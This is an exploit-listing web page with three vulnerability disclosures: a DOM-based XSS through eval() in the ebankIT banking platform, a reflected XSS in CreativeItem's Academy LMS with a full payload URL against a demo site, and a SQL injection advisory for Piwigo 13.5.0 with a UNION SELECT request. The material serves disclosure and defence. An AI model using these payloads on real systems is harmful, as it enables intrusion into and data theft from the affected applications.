Latest exploits :: CodePwn

<pre><code>CVE-2023-30454 [Description] An issue was discovered in ebankIT before version 7. Document Object Model based XSS exists within the /Security/Transactions/Transactions.aspx endpoint. Users can supply their own JavaScript within the ctl100$ctl00MainContent$TransactionMainContent$accControl$hdnAccountsArray POST parameter that will be passed to an eval() function and executed upon pressing the continue button. ------------------------------------------ [Vulnerability Type] Cross Site Scripting (XSS) ------------------------------------------ [Vendor of Product] ebankIT ------------------------------------------ [Affected Product Code Base] ebankIT - Omnichannel Digital Banking Platform - Version 6, patched in version 7 ------------------------------------------ [Affected Component] The endpoint existing at: /Security/Transactions/Transactions.aspx ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Code execution] true ------------------------------------------ [Attack Vectors] I discovered a Document Object Model-based Cross-Site Scripting issue within the ebankIT platform. While manually inspecting the client-side JavaScript code I came across the variable JSONText. This variable was using the eval function to parse data passed to it through the accobj variable. Knowing the eval function evaluates text as JavaScript, I proceeded to locate exactly what data was passed to this variable. I found that the data could be supplied by a user during a Transfer request (on /Security/Transactions/Transactions.aspx), when selecting which account to transfer from. To execute this XSS, I intercepted our test user s Transfer request, supplied my own custom JavaScript alert(4) in the ctl100$ctl00MainContent$TransactionMainContent$accControl$hdnAccountsArray POST parameter, and pressed the continue button which resulted in the payload successfully executing. ------------------------------------------ [Discoverer] Jake Murphy </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : creativeitem.com │ │ Vendor : CreativeItem │ │ Software : CreativeItem - Academy Learning Management System 5.14 │ │ Vuln Type: Reflected XSS │ │ Method : GET │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ GET parameter 'sort_by' is vulnerable to RXSS Path: /academy/home/courses https://demo.creativeitem.com/academy/home/courses?category=photoshop&price=paid&level=beginner&language=arabic&rating=2&sort_by=newestbezzi%22%3e%3cscript%3ealert(1)%3c%2fscript%3ebrmil [-] Done </code></pre>

<pre><code>=====[ Tempest Security Intelligence - ADV-03/2023 ]========================== Piwigo - Version 13.5.0 Author: Rodolfo Tavares Tempest Security Intelligence - Recife, Pernambuco - Brazil =====[ Table of Contents]================================================== * Overview * Detailed description * Timeline of disclosure * Thanks & Acknowledgments * References =====[ Vulnerability Information]============================================= * Class: improper Neutralization of Special Elements used in an SQL Command ('SQL injection') [CWE-89] improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') * CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H * CVE-2023-26876 =====[ Overview]======================================================== * System affected : Piwigo - Version 13.5.0 * Software Version : Version 13.5.0 (other versions may also be affected). * Impact : Piwigo 13.5.0 is vulnerable to SQL injection via /filter_user_id parameter to the admin.php?page=history&filter_image_id=&filter_user_id endpoint. An attacker can exploit this by executing SQL injection code to retrieve sensitive (P1) information and performing unintended actions. =====[ Detailed description]================================================= An authenticated user could run SQLi commands in the application and retrieve sensitive information (P1) and database information. Using the endpoint http://localhost/admin.php?page=history&filter_image_id=&filter_user_id. To explore just execute the following request: GET /piwigo/admin.php?page=history&filter_image_id=v3cna&filder_user_id=1%20UNION%20ALL%20SELECT %20CONCAT(0x4141414141,IFNULL(CAST(VERSION()%20AS%20NCHAR),0x20),0x4141414141)--%20-- HTTP/1.1 Host: localhost Cookie: pwg_id=cookies Check the value contained in the *filter_image_id* variable at the request response. =====[ Timeline of disclosure]=============================================== 12/Fev/2023 - Responsible disclosure was initiated with the vendor. 17/Fev/2023 - Piwigo confirmed the issue; 08/Mar/2023 - CVE-2023-26876 was assigned and reserved. 09/Mar/2023 - The vendor fixed the vulnerability SQL Injection. =====[ Thanks & Acknowledgments]======================================== * fxo,ravs * Henrique Arcoverde < henrique.arcoverde () tempest.com.br > * Tempest Security Intelligence / Tempest's Pentest Team [3] =====[ References ]===================================================== [1][https://cwe.mitre.org/data/definitions/89.html] [2][https://github.com/Piwigo/Piwigo/issues/1876] [3][https://www.tempest.com.br|http://www.tempest.com.br/] [4][https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26876] =====[ EOF ]=========================================================== -- -- *Esta mensagem é para uso exclusivo de seu destinatário e pode conter informações privilegiadas e confidenciais. Todas as informações aqui contidas devem ser tratadas como confidenciais e não devem ser divulgadas a terceiros sem o prévio consentimento por escrito da Tempest. Se você não é o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste caso, por favor, notifique o remetente da mesma e destrua imediatamente a mensagem.* * * *This message is intended solely for the use of its addressee and may contain privileged or confidential information. All information contained herein shall be treated as confidential and shall not be disclosed to any third party without Tempest’s prior written approval. If you are not the addressee you should not distribute, copy or file this message. In this case, please notify the sender and destroy its contents immediately.** * * * </code></pre>